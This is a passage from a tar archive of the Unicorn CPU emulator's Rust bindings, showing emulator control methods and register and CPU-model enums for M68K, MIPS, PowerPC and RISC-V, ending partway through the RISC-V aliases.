UC_CTL_READ!(ControlType::UC_CTL_CPU_MODEL), &mut result, ) } .and(Ok(result)) } pub fn ctl_set_cpu_model(&self, cpu_model: i32) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_CPU_MODEL), cpu_model, ) } .into() } pub fn ctl_remove_cache(&self, address: u64, end: u64) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TB_REMOVE_CACHE), address, end, ) } .into() } pub fn ctl_request_cache( &self, address: u64, tb: &mut TranslationBlock, ) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ_WRITE!(ControlType::UC_CTL_TB_REQUEST_CACHE), address, tb, ) } .into() } pub fn ctl_flush_tb(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TB_FLUSH), ) } .into() } pub fn ctl_flush_tlb(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), 
UC_CTL_WRITE!(ControlType::UC_CTL_TLB_FLUSH), ) } .into() } pub fn ctl_context_mode(&self, mode: ContextMode) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_CONTEXT_MODE), mode, ) } .into() } pub fn ctl_tlb_type(&self, t: TlbType) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TLB_TYPE), t as i32, ) } .into() } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/m68k.rs�������������������������������������������������������������0000664�0000000�0000000�00000001667�14675241067�0017732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // M68K registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterM68K { INVALID = 0, A0, A1, A2, A3, A4, A5, A6, A7, D0, D1, D2, D3, D4, D5, D6, D7, SR, PC, ENDING, } impl From<RegisterM68K> for i32 { fn from(r: RegisterM68K) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum M68kCpuModel { UC_CPU_M68K_M5206 = 0, UC_CPU_M68K_M68000 = 1, UC_CPU_M68K_M68020 = 2, UC_CPU_M68K_M68030 = 3, UC_CPU_M68K_M68040 = 4, UC_CPU_M68K_M68060 = 5, UC_CPU_M68K_M5208 = 6, UC_CPU_M68K_CFV4E = 7, UC_CPU_M68K_ANY = 8, } impl From<M68kCpuModel> for i32 { fn from(value: M68kCpuModel) -> Self { value as i32 } } impl From<&M68kCpuModel> for i32 { fn from(value: &M68kCpuModel) -> Self { (*value) as i32 } } �������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/mips.rs�������������������������������������������������������������0000664�0000000�0000000�00000014473�14675241067�0020114�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT // MIPS registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterMIPS { INVALID = 0, // General purpose registers PC = 1, R0 = 2, R1 = 3, R2 = 4, R3 = 5, R4 = 6, R5 = 7, R6 = 8, R7 = 9, R8 = 10, R9 = 11, R10 = 12, R11 = 13, R12 = 14, R13 = 15, R14 = 16, R15 = 17, R16 = 18, R17 = 19, R18 = 20, R19 = 21, R20 = 22, R21 = 23, R22 = 24, R23 = 25, R24 = 26, R25 = 27, R26 = 28, R27 = 29, R28 = 30, R29 = 31, R30 = 32, R31 = 33, // DSP registers DSPCCOND = 34, DSPCARRY = 35, DSPEFI = 36, DSPOUTFLAG = 37, DSPOUTFLAG16_19 = 38, DSPOUTFLAG20 = 39, DSPOUTFLAG21 = 40, DSPOUTFLAG22 = 41, DSPOUTFLAG23 = 42, DSPPOS = 43, DSPSCOUNT = 44, // ACC registers AC0 = 45, AC1 = 46, AC2 = 47, AC3 = 48, // COP registers CC0 = 49, CC1 = 50, CC2 = 51, CC3 = 52, CC4 = 53, CC5 = 54, CC6 = 55, CC7 = 56, // FPU registers F0 = 57, F1 = 58, F2 = 59, F3 = 60, F4 = 61, F5 = 62, F6 = 63, F7 = 64, F8 = 65, F9 = 66, F10 = 67, F11 = 68, F12 = 69, F13 = 70, F14 = 71, F15 = 72, F16 = 73, F17 = 74, F18 = 75, F19 = 76, F20 = 77, F21 = 78, F22 = 79, F23 = 80, F24 = 81, F25 = 82, F26 = 83, F27 = 84, F28 = 85, F29 = 86, F30 = 87, F31 = 88, FCC0 = 89, FCC1 = 90, FCC2 = 91, FCC3 = 92, FCC4 = 93, FCC5 = 94, FCC6 = 95, FCC7 = 96, // AFPR128 W0 = 97, W1 = 98, W2 = 99, W3 = 100, W4 = 101, W5 = 102, W6 = 103, W7 = 104, W8 = 105, W9 = 106, W10 = 107, W11 = 108, W12 = 109, W13 = 110, W14 = 111, W15 = 112, W16 = 113, W17 = 114, W18 = 115, W19 = 116, W20 = 117, W21 = 118, W22 = 119, W23 = 120, W24 = 121, W25 = 122, W26 = 123, W27 = 124, W28 = 125, W29 = 126, W30 = 127, W31 = 128, HI = 129, LO = 130, P0 = 131, P1 = 132, P2 = 133, MPL0 = 134, MPL1 = 135, MPL2 = 136, CP0_CONFIG3 = 137, CP0_USERLOCAL = 138, CP0_STATUS = 139, ENDING = 140, } impl RegisterMIPS { // alias registers // (assoc) ZERO = 2, // (assoc) AT = 3, // (assoc) V0 = 4, // (assoc) V1 = 5, // (assoc) A0 = 6, // (assoc) A1 = 7, // (assoc) A2 = 8, // (assoc) A3 = 9, // (assoc) T0 = 10, // (assoc) T1 = 11, // (assoc) T2 = 12, // (assoc) T3 = 13, // (assoc) T4 = 14, // (assoc) T5 = 15, // (assoc) T6 = 16, // (assoc) T7 = 17, // (assoc) S0 = 18, // (assoc) S1 = 19, // (assoc) S2 = 20, // (assoc) S3 = 21, // (assoc) S4 = 22, // (assoc) S5 = 23, // (assoc) S6 = 24, // (assoc) S7 = 25, // (assoc) T8 = 26, // (assoc) T9 = 27, // (assoc) K0 = 28, // (assoc) K1 = 29, // (assoc) GP = 30, // (assoc) SP = 31, // (assoc) FP = 32, // (assoc) S8 = 32, // (assoc) RA = 33, // (assoc) HI0 = 45, // (assoc) HI1 = 46, // (assoc) HI2 = 47, // (assoc) HI3 = 48, // (assoc) LO0 = 45, // (assoc) LO1 = 46, // (assoc) LO2 = 47, // (assoc) LO3 = 48, pub const ZERO: RegisterMIPS = RegisterMIPS::R0; pub const AT: RegisterMIPS = RegisterMIPS::R1; pub const V0: RegisterMIPS = RegisterMIPS::R2; pub const V1: RegisterMIPS = RegisterMIPS::R3; pub const A0: RegisterMIPS = RegisterMIPS::R4; pub const A1: RegisterMIPS = RegisterMIPS::R5; pub const A2: RegisterMIPS = RegisterMIPS::R6; pub const A3: RegisterMIPS = RegisterMIPS::R7; pub const T0: RegisterMIPS = RegisterMIPS::R8; pub const T1: RegisterMIPS = RegisterMIPS::R9; pub const T2: RegisterMIPS = RegisterMIPS::R10; pub const T3: RegisterMIPS = RegisterMIPS::R11; pub const T4: RegisterMIPS = RegisterMIPS::R12; pub const T5: RegisterMIPS = RegisterMIPS::R13; pub const T6: RegisterMIPS = RegisterMIPS::R14; pub const T7: RegisterMIPS = RegisterMIPS::R15; pub const S0: RegisterMIPS = RegisterMIPS::R16; pub const S1: RegisterMIPS = RegisterMIPS::R17; pub const S2: RegisterMIPS = RegisterMIPS::R18; pub const S3: RegisterMIPS 
= RegisterMIPS::R19; pub const S4: RegisterMIPS = RegisterMIPS::R20; pub const S5: RegisterMIPS = RegisterMIPS::R21; pub const S6: RegisterMIPS = RegisterMIPS::R22; pub const S7: RegisterMIPS = RegisterMIPS::R23; pub const T8: RegisterMIPS = RegisterMIPS::R24; pub const T9: RegisterMIPS = RegisterMIPS::R25; pub const K0: RegisterMIPS = RegisterMIPS::R26; pub const K1: RegisterMIPS = RegisterMIPS::R27; pub const GP: RegisterMIPS = RegisterMIPS::R28; pub const SP: RegisterMIPS = RegisterMIPS::R29; pub const FP: RegisterMIPS = RegisterMIPS::R30; pub const S8: RegisterMIPS = RegisterMIPS::R30; pub const RA: RegisterMIPS = RegisterMIPS::R31; pub const HI0: RegisterMIPS = RegisterMIPS::AC0; pub const HI1: RegisterMIPS = RegisterMIPS::AC1; pub const HI2: RegisterMIPS = RegisterMIPS::AC2; pub const HI3: RegisterMIPS = RegisterMIPS::AC3; pub const LO0: RegisterMIPS = RegisterMIPS::AC0; pub const LO1: RegisterMIPS = RegisterMIPS::AC1; pub const LO2: RegisterMIPS = RegisterMIPS::AC2; pub const LO3: RegisterMIPS = RegisterMIPS::AC3; } impl From<RegisterMIPS> for i32 { fn from(r: RegisterMIPS) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Mips32CpuModel { UC_CPU_MIPS32_4KC = 0, UC_CPU_MIPS32_4KM = 1, UC_CPU_MIPS32_4KECR1 = 2, UC_CPU_MIPS32_4KEMR1 = 3, UC_CPU_MIPS32_4KEC = 4, UC_CPU_MIPS32_4KEM = 5, UC_CPU_MIPS32_24KC = 6, UC_CPU_MIPS32_24KEC = 7, UC_CPU_MIPS32_24KF = 8, UC_CPU_MIPS32_34KF = 9, UC_CPU_MIPS32_74KF = 10, UC_CPU_MIPS32_M14K = 11, UC_CPU_MIPS32_M14KC = 12, UC_CPU_MIPS32_P5600 = 13, UC_CPU_MIPS32_MIPS32R6_GENERIC = 14, UC_CPU_MIPS32_I7200 = 15, } impl From<Mips32CpuModel> for i32 { fn from(value: Mips32CpuModel) -> Self { value as i32 } } impl From<&Mips32CpuModel> for i32 { fn from(value: &Mips32CpuModel) -> Self { *value as i32 } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/ppc.rs��������������������������������������������������������������0000664�0000000�0000000�00000024461�14675241067�0017724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT // PowerPC registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterPPC { INVALID = 0, PC = 1, R0 = 2, R1 = 3, R2 = 4, R3 = 5, R4 = 6, R5 = 7, R6 = 8, R7 = 9, R8 = 10, R9 = 11, R10 = 12, R11 = 13, R12 = 14, R13 = 15, R14 = 16, R15 = 17, R16 = 18, R17 = 19, R18 = 20, R19 = 21, R20 = 22, R21 = 23, R22 = 24, R23 = 25, R24 = 26, R25 = 27, R26 = 28, R27 = 29, R28 = 30, R29 = 31, R30 = 32, R31 = 33, CR0 = 34, CR1 = 35, CR2 = 36, CR3 = 37, CR4 = 38, CR5 = 39, CR6 = 40, CR7 = 41, FPR0 = 42, FPR1 = 43, FPR2 = 44, FPR3 = 45, FPR4 = 46, FPR5 = 47, FPR6 = 48, FPR7 = 49, FPR8 = 50, FPR9 = 51, FPR10 = 52, FPR11 = 53, FPR12 = 54, FPR13 = 55, FPR14 = 56, FPR15 = 57, FPR16 = 58, FPR17 = 59, FPR18 = 60, FPR19 = 61, FPR20 = 62, FPR21 = 63, FPR22 = 64, FPR23 = 65, FPR24 = 66, FPR25 = 67, FPR26 = 68, FPR27 = 69, FPR28 = 70, FPR29 = 71, FPR30 = 72, FPR31 = 73, LR = 74, XER = 75, CTR = 76, MSR = 77, FPSCR = 78, CR = 79, ENDING = 80, } impl From<RegisterPPC> for i32 { fn from(r: RegisterPPC) -> Self { r as i32 } } #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum PpcCpuModel { UC_CPU_PPC32_401 = 0, UC_CPU_PPC32_401A1, UC_CPU_PPC32_401B2, UC_CPU_PPC32_401C2, UC_CPU_PPC32_401D2, UC_CPU_PPC32_401E2, UC_CPU_PPC32_401F2, UC_CPU_PPC32_401G2, UC_CPU_PPC32_IOP480, UC_CPU_PPC32_COBRA, UC_CPU_PPC32_403GA, UC_CPU_PPC32_403GB, UC_CPU_PPC32_403GC, UC_CPU_PPC32_403GCX, UC_CPU_PPC32_405D2, UC_CPU_PPC32_405D4, UC_CPU_PPC32_405CRA, UC_CPU_PPC32_405CRB, UC_CPU_PPC32_405CRC, UC_CPU_PPC32_405EP, UC_CPU_PPC32_405EZ, UC_CPU_PPC32_405GPA, UC_CPU_PPC32_405GPB, UC_CPU_PPC32_405GPC, UC_CPU_PPC32_405GPD, UC_CPU_PPC32_405GPR, UC_CPU_PPC32_405LP, UC_CPU_PPC32_NPE405H, UC_CPU_PPC32_NPE405H2, UC_CPU_PPC32_NPE405L, UC_CPU_PPC32_NPE4GS3, UC_CPU_PPC32_STB03, UC_CPU_PPC32_STB04, UC_CPU_PPC32_STB25, UC_CPU_PPC32_X2VP4, UC_CPU_PPC32_X2VP20, UC_CPU_PPC32_440_XILINX, UC_CPU_PPC32_440_XILINX_W_DFPU, UC_CPU_PPC32_440EPA, UC_CPU_PPC32_440EPB, UC_CPU_PPC32_440EPX, UC_CPU_PPC32_460EXB, UC_CPU_PPC32_G2, UC_CPU_PPC32_G2H4, UC_CPU_PPC32_G2GP, UC_CPU_PPC32_G2LS, UC_CPU_PPC32_G2HIP3, UC_CPU_PPC32_G2HIP4, UC_CPU_PPC32_MPC603, UC_CPU_PPC32_G2LE, UC_CPU_PPC32_G2LEGP, UC_CPU_PPC32_G2LELS, UC_CPU_PPC32_G2LEGP1, UC_CPU_PPC32_G2LEGP3, UC_CPU_PPC32_MPC5200_V10, UC_CPU_PPC32_MPC5200_V11, UC_CPU_PPC32_MPC5200_V12, UC_CPU_PPC32_MPC5200B_V20, UC_CPU_PPC32_MPC5200B_V21, UC_CPU_PPC32_E200Z5, UC_CPU_PPC32_E200Z6, UC_CPU_PPC32_E300C1, UC_CPU_PPC32_E300C2, UC_CPU_PPC32_E300C3, UC_CPU_PPC32_E300C4, UC_CPU_PPC32_MPC8343, UC_CPU_PPC32_MPC8343A, UC_CPU_PPC32_MPC8343E, UC_CPU_PPC32_MPC8343EA, UC_CPU_PPC32_MPC8347T, UC_CPU_PPC32_MPC8347P, UC_CPU_PPC32_MPC8347AT, UC_CPU_PPC32_MPC8347AP, UC_CPU_PPC32_MPC8347ET, UC_CPU_PPC32_MPC8347EP, UC_CPU_PPC32_MPC8347EAT, UC_CPU_PPC32_MPC8347EAP, UC_CPU_PPC32_MPC8349, UC_CPU_PPC32_MPC8349A, UC_CPU_PPC32_MPC8349E, UC_CPU_PPC32_MPC8349EA, UC_CPU_PPC32_MPC8377, UC_CPU_PPC32_MPC8377E, UC_CPU_PPC32_MPC8378, UC_CPU_PPC32_MPC8378E, UC_CPU_PPC32_MPC8379, UC_CPU_PPC32_MPC8379E, UC_CPU_PPC32_E500_V10, UC_CPU_PPC32_E500_V20, UC_CPU_PPC32_E500V2_V10, UC_CPU_PPC32_E500V2_V20, UC_CPU_PPC32_E500V2_V21, UC_CPU_PPC32_E500V2_V22, UC_CPU_PPC32_E500V2_V30, UC_CPU_PPC32_E500MC, UC_CPU_PPC32_MPC8533_V10, UC_CPU_PPC32_MPC8533_V11, UC_CPU_PPC32_MPC8533E_V10, UC_CPU_PPC32_MPC8533E_V11, UC_CPU_PPC32_MPC8540_V10, UC_CPU_PPC32_MPC8540_V20, UC_CPU_PPC32_MPC8540_V21, UC_CPU_PPC32_MPC8541_V10, UC_CPU_PPC32_MPC8541_V11, UC_CPU_PPC32_MPC8541E_V10, UC_CPU_PPC32_MPC8541E_V11, UC_CPU_PPC32_MPC8543_V10, 
UC_CPU_PPC32_MPC8543_V11, UC_CPU_PPC32_MPC8543_V20, UC_CPU_PPC32_MPC8543_V21, UC_CPU_PPC32_MPC8543E_V10, UC_CPU_PPC32_MPC8543E_V11, UC_CPU_PPC32_MPC8543E_V20, UC_CPU_PPC32_MPC8543E_V21, UC_CPU_PPC32_MPC8544_V10, UC_CPU_PPC32_MPC8544_V11, UC_CPU_PPC32_MPC8544E_V10, UC_CPU_PPC32_MPC8544E_V11, UC_CPU_PPC32_MPC8545_V20, UC_CPU_PPC32_MPC8545_V21, UC_CPU_PPC32_MPC8545E_V20, UC_CPU_PPC32_MPC8545E_V21, UC_CPU_PPC32_MPC8547E_V20, UC_CPU_PPC32_MPC8547E_V21, UC_CPU_PPC32_MPC8548_V10, UC_CPU_PPC32_MPC8548_V11, UC_CPU_PPC32_MPC8548_V20, UC_CPU_PPC32_MPC8548_V21, UC_CPU_PPC32_MPC8548E_V10, UC_CPU_PPC32_MPC8548E_V11, UC_CPU_PPC32_MPC8548E_V20, UC_CPU_PPC32_MPC8548E_V21, UC_CPU_PPC32_MPC8555_V10, UC_CPU_PPC32_MPC8555_V11, UC_CPU_PPC32_MPC8555E_V10, UC_CPU_PPC32_MPC8555E_V11, UC_CPU_PPC32_MPC8560_V10, UC_CPU_PPC32_MPC8560_V20, UC_CPU_PPC32_MPC8560_V21, UC_CPU_PPC32_MPC8567, UC_CPU_PPC32_MPC8567E, UC_CPU_PPC32_MPC8568, UC_CPU_PPC32_MPC8568E, UC_CPU_PPC32_MPC8572, UC_CPU_PPC32_MPC8572E, UC_CPU_PPC32_E600, UC_CPU_PPC32_MPC8610, UC_CPU_PPC32_MPC8641, UC_CPU_PPC32_MPC8641D, UC_CPU_PPC32_601_V0, UC_CPU_PPC32_601_V1, UC_CPU_PPC32_601_V2, UC_CPU_PPC32_602, UC_CPU_PPC32_603, UC_CPU_PPC32_603E_V1_1, UC_CPU_PPC32_603E_V1_2, UC_CPU_PPC32_603E_V1_3, UC_CPU_PPC32_603E_V1_4, UC_CPU_PPC32_603E_V2_2, UC_CPU_PPC32_603E_V3, UC_CPU_PPC32_603E_V4, UC_CPU_PPC32_603E_V4_1, UC_CPU_PPC32_603E7, UC_CPU_PPC32_603E7T, UC_CPU_PPC32_603E7V, UC_CPU_PPC32_603E7V1, UC_CPU_PPC32_603E7V2, UC_CPU_PPC32_603P, UC_CPU_PPC32_604, UC_CPU_PPC32_604E_V1_0, UC_CPU_PPC32_604E_V2_2, UC_CPU_PPC32_604E_V2_4, UC_CPU_PPC32_604R, UC_CPU_PPC32_740_V1_0, UC_CPU_PPC32_750_V1_0, UC_CPU_PPC32_740_V2_0, UC_CPU_PPC32_750_V2_0, UC_CPU_PPC32_740_V2_1, UC_CPU_PPC32_750_V2_1, UC_CPU_PPC32_740_V2_2, UC_CPU_PPC32_750_V2_2, UC_CPU_PPC32_740_V3_0, UC_CPU_PPC32_750_V3_0, UC_CPU_PPC32_740_V3_1, UC_CPU_PPC32_750_V3_1, UC_CPU_PPC32_740E, UC_CPU_PPC32_750E, UC_CPU_PPC32_740P, UC_CPU_PPC32_750P, UC_CPU_PPC32_750CL_V1_0, UC_CPU_PPC32_750CL_V2_0, UC_CPU_PPC32_750CX_V1_0, UC_CPU_PPC32_750CX_V2_0, UC_CPU_PPC32_750CX_V2_1, UC_CPU_PPC32_750CX_V2_2, UC_CPU_PPC32_750CXE_V2_1, UC_CPU_PPC32_750CXE_V2_2, UC_CPU_PPC32_750CXE_V2_3, UC_CPU_PPC32_750CXE_V2_4, UC_CPU_PPC32_750CXE_V2_4B, UC_CPU_PPC32_750CXE_V3_0, UC_CPU_PPC32_750CXE_V3_1, UC_CPU_PPC32_750CXE_V3_1B, UC_CPU_PPC32_750CXR, UC_CPU_PPC32_750FL, UC_CPU_PPC32_750FX_V1_0, UC_CPU_PPC32_750FX_V2_0, UC_CPU_PPC32_750FX_V2_1, UC_CPU_PPC32_750FX_V2_2, UC_CPU_PPC32_750FX_V2_3, UC_CPU_PPC32_750GL, UC_CPU_PPC32_750GX_V1_0, UC_CPU_PPC32_750GX_V1_1, UC_CPU_PPC32_750GX_V1_2, UC_CPU_PPC32_750L_V2_0, UC_CPU_PPC32_750L_V2_1, UC_CPU_PPC32_750L_V2_2, UC_CPU_PPC32_750L_V3_0, UC_CPU_PPC32_750L_V3_2, UC_CPU_PPC32_745_V1_0, UC_CPU_PPC32_755_V1_0, UC_CPU_PPC32_745_V1_1, UC_CPU_PPC32_755_V1_1, UC_CPU_PPC32_745_V2_0, UC_CPU_PPC32_755_V2_0, UC_CPU_PPC32_745_V2_1, UC_CPU_PPC32_755_V2_1, UC_CPU_PPC32_745_V2_2, UC_CPU_PPC32_755_V2_2, UC_CPU_PPC32_745_V2_3, UC_CPU_PPC32_755_V2_3, UC_CPU_PPC32_745_V2_4, UC_CPU_PPC32_755_V2_4, UC_CPU_PPC32_745_V2_5, UC_CPU_PPC32_755_V2_5, UC_CPU_PPC32_745_V2_6, UC_CPU_PPC32_755_V2_6, UC_CPU_PPC32_745_V2_7, UC_CPU_PPC32_755_V2_7, UC_CPU_PPC32_745_V2_8, UC_CPU_PPC32_755_V2_8, UC_CPU_PPC32_7400_V1_0, UC_CPU_PPC32_7400_V1_1, UC_CPU_PPC32_7400_V2_0, UC_CPU_PPC32_7400_V2_1, UC_CPU_PPC32_7400_V2_2, UC_CPU_PPC32_7400_V2_6, UC_CPU_PPC32_7400_V2_7, UC_CPU_PPC32_7400_V2_8, UC_CPU_PPC32_7400_V2_9, UC_CPU_PPC32_7410_V1_0, UC_CPU_PPC32_7410_V1_1, UC_CPU_PPC32_7410_V1_2, UC_CPU_PPC32_7410_V1_3, UC_CPU_PPC32_7410_V1_4, UC_CPU_PPC32_7448_V1_0, 
UC_CPU_PPC32_7448_V1_1, UC_CPU_PPC32_7448_V2_0, UC_CPU_PPC32_7448_V2_1, UC_CPU_PPC32_7450_V1_0, UC_CPU_PPC32_7450_V1_1, UC_CPU_PPC32_7450_V1_2, UC_CPU_PPC32_7450_V2_0, UC_CPU_PPC32_7450_V2_1, UC_CPU_PPC32_7441_V2_1, UC_CPU_PPC32_7441_V2_3, UC_CPU_PPC32_7451_V2_3, UC_CPU_PPC32_7441_V2_10, UC_CPU_PPC32_7451_V2_10, UC_CPU_PPC32_7445_V1_0, UC_CPU_PPC32_7455_V1_0, UC_CPU_PPC32_7445_V2_1, UC_CPU_PPC32_7455_V2_1, UC_CPU_PPC32_7445_V3_2, UC_CPU_PPC32_7455_V3_2, UC_CPU_PPC32_7445_V3_3, UC_CPU_PPC32_7455_V3_3, UC_CPU_PPC32_7445_V3_4, UC_CPU_PPC32_7455_V3_4, UC_CPU_PPC32_7447_V1_0, UC_CPU_PPC32_7457_V1_0, UC_CPU_PPC32_7447_V1_1, UC_CPU_PPC32_7457_V1_1, UC_CPU_PPC32_7457_V1_2, UC_CPU_PPC32_7447A_V1_0, UC_CPU_PPC32_7457A_V1_0, UC_CPU_PPC32_7447A_V1_1, UC_CPU_PPC32_7457A_V1_1, UC_CPU_PPC32_7447A_V1_2, UC_CPU_PPC32_7457A_V1_2, } impl From<PpcCpuModel> for i32 { fn from(value: PpcCpuModel) -> Self { value as i32 } } impl From<&PpcCpuModel> for i32 { fn from(value: &PpcCpuModel) -> Self { (*value) as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Ppc64CpuModel { UC_CPU_PPC64_E5500 = 0, UC_CPU_PPC64_E6500, UC_CPU_PPC64_970_V2_2, UC_CPU_PPC64_970FX_V1_0, UC_CPU_PPC64_970FX_V2_0, UC_CPU_PPC64_970FX_V2_1, UC_CPU_PPC64_970FX_V3_0, UC_CPU_PPC64_970FX_V3_1, UC_CPU_PPC64_970MP_V1_0, UC_CPU_PPC64_970MP_V1_1, UC_CPU_PPC64_POWER5_V2_1, UC_CPU_PPC64_POWER7_V2_3, UC_CPU_PPC64_POWER7_V2_1, UC_CPU_PPC64_POWER8E_V2_1, UC_CPU_PPC64_POWER8_V2_0, UC_CPU_PPC64_POWER8NVL_V1_0, UC_CPU_PPC64_POWER9_V1_0, UC_CPU_PPC64_POWER9_V2_0, UC_CPU_PPC64_POWER10_V1_0, } impl From<Ppc64CpuModel> for i32 { fn from(value: Ppc64CpuModel) -> Self { value as i32 } } impl From<&Ppc64CpuModel> for i32 { fn from(value: &Ppc64CpuModel) -> Self { (*value) as i32 } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/riscv.rs������������������������������������������������������������0000664�0000000�0000000�00000023247�14675241067�0020271�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // RISCV registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterRISCV { INVALID = 0, // General purpose registers X0 = 1, X1 = 2, X2 = 3, X3 = 4, X4 = 5, X5 = 6, X6 = 7, X7 = 8, X8 = 9, X9 = 10, X10 = 11, X11 = 12, X12 = 13, X13 = 14, X14 = 15, X15 = 16, X16 = 17, X17 = 18, X18 = 19, X19 = 20, X20 = 21, X21 = 22, X22 = 23, X23 = 24, X24 = 25, X25 = 26, X26 = 27, X27 = 28, X28 = 29, X29 = 30, X30 = 31, X31 = 32, // CSR USTATUS = 33, UIE = 34, UTVEC = 35, USCRATCH = 36, UEPC = 37, UCAUSE = 38, UTVAL = 39, UIP = 40, FFLAGS = 41, FRM = 42, FCSR = 43, CYCLE = 44, TIME = 45, INSTRET = 46, HPMCOUNTER3 = 47, HPMCOUNTER4 = 48, HPMCOUNTER5 = 49, HPMCOUNTER6 = 50, HPMCOUNTER7 = 51, HPMCOUNTER8 = 52, HPMCOUNTER9 = 53, HPMCOUNTER10 = 54, HPMCOUNTER11 = 55, HPMCOUNTER12 = 56, HPMCOUNTER13 = 57, HPMCOUNTER14 = 58, HPMCOUNTER15 = 59, HPMCOUNTER16 = 60, HPMCOUNTER17 = 61, HPMCOUNTER18 = 62, HPMCOUNTER19 = 63, HPMCOUNTER20 = 64, HPMCOUNTER21 = 65, HPMCOUNTER22 = 66, HPMCOUNTER23 = 67, HPMCOUNTER24 = 68, HPMCOUNTER25 = 
69, HPMCOUNTER26 = 70, HPMCOUNTER27 = 71, HPMCOUNTER28 = 72, HPMCOUNTER29 = 73, HPMCOUNTER30 = 74, HPMCOUNTER31 = 75, CYCLEH = 76, TIMEH = 77, INSTRETH = 78, HPMCOUNTER3H = 79, HPMCOUNTER4H = 80, HPMCOUNTER5H = 81, HPMCOUNTER6H = 82, HPMCOUNTER7H = 83, HPMCOUNTER8H = 84, HPMCOUNTER9H = 85, HPMCOUNTER10H = 86, HPMCOUNTER11H = 87, HPMCOUNTER12H = 88, HPMCOUNTER13H = 89, HPMCOUNTER14H = 90, HPMCOUNTER15H = 91, HPMCOUNTER16H = 92, HPMCOUNTER17H = 93, HPMCOUNTER18H = 94, HPMCOUNTER19H = 95, HPMCOUNTER20H = 96, HPMCOUNTER21H = 97, HPMCOUNTER22H = 98, HPMCOUNTER23H = 99, HPMCOUNTER24H = 100, HPMCOUNTER25H = 101, HPMCOUNTER26H = 102, HPMCOUNTER27H = 103, HPMCOUNTER28H = 104, HPMCOUNTER29H = 105, HPMCOUNTER30H = 106, HPMCOUNTER31H = 107, MCYCLE = 108, MINSTRET = 109, MCYCLEH = 110, MINSTRETH = 111, MVENDORID = 112, MARCHID = 113, MIMPID = 114, MHARTID = 115, MSTATUS = 116, MISA = 117, MEDELEG = 118, MIDELEG = 119, MIE = 120, MTVEC = 121, MCOUNTEREN = 122, MSTATUSH = 123, MUCOUNTEREN = 124, MSCOUNTEREN = 125, MHCOUNTEREN = 126, MSCRATCH = 127, MEPC = 128, MCAUSE = 129, MTVAL = 130, MIP = 131, MBADADDR = 132, SSTATUS = 133, SEDELEG = 134, SIDELEG = 135, SIE = 136, STVEC = 137, SCOUNTEREN = 138, SSCRATCH = 139, SEPC = 140, SCAUSE = 141, STVAL = 142, SIP = 143, SBADADDR = 144, SPTBR = 145, SATP = 146, HSTATUS = 147, HEDELEG = 148, HIDELEG = 149, HIE = 150, HCOUNTEREN = 151, HTVAL = 152, HIP = 153, HTINST = 154, HGATP = 155, HTIMEDELTA = 156, HTIMEDELTAH = 157, // Floating-point registers F0 = 158, F1 = 159, F2 = 160, F3 = 161, F4 = 162, F5 = 163, F6 = 164, F7 = 165, F8 = 166, F9 = 167, F10 = 168, F11 = 169, F12 = 170, F13 = 171, F14 = 172, F15 = 173, F16 = 174, F17 = 175, F18 = 176, F19 = 177, F20 = 178, F21 = 179, F22 = 180, F23 = 181, F24 = 182, F25 = 183, F26 = 184, F27 = 185, F28 = 186, F29 = 187, F30 = 188, F31 = 189, PC = 190, ENDING = 191, } impl RegisterRISCV { // Alias registers // (assoc) ZERO = 1, // (assoc) RA = 2, // (assoc) SP = 3, // (assoc) GP = 4, // (assoc) TP = 5, // (assoc) T0 = 6, // (assoc) T1 = 7, // (assoc) T2 = 8, // (assoc) S0 = 9, // (assoc) FP = 9, // (assoc) S1 = 10, // (assoc) A0 = 11, // (assoc) A1 = 12, // (assoc) A2 = 13, // (assoc) A3 = 14, // (assoc) A4 = 15, // (assoc) A5 = 16, // (assoc) A6 = 17, // (assoc) A7 = 18, // (assoc) S2 = 19, // (assoc) S3 = 20, // (assoc) S4 = 21, // (assoc) S5 = 22, // (assoc) S6 = 23, // (assoc) S7 = 24, // (assoc) S8 = 25, // (assoc) S9 = 26, // (assoc) S10 = 27, // (assoc) S11 = 28, // (assoc) T3 = 29, // (assoc) T4 = 30, // (assoc) T5 = 31, // (assoc) T6 = 